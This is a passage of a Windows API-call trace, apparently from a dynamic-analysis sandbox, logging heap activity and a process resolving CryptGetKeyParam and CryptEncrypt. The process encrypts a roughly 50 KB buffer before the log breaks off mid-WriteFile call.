CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0092.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0092.668] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0092.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0092.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0092.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0092.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0092.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0092.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0092.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0092.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0092.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0092.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0092.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0092.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0092.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0092.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0092.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0092.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0092.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0092.671] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0092.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0092.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0092.672] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0092.672] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2790, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2790*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0092.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0092.674] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0092.674] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0092.675] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0092.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0092.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0092.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0092.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0092.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0092.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0092.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0092.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0092.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0092.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0092.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0092.676] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0092.677] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xc713, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xc720) returned 1 [0092.677] CharLowerBuffW (in: lpsz="byte[50977]", cchLength=0xb | out: lpsz="byte[50977]") returned 0xb [0092.679] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.679] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0092.679] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x453b570*, pdwDataLen=0x144e538*=0xc713, dwBufLen=0xc720 | out: pbData=0x453b570*, pdwDataLen=0x144e538*=0xc720) returned 1 [0092.680] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0092.680] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0092.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.724] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xc720, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, 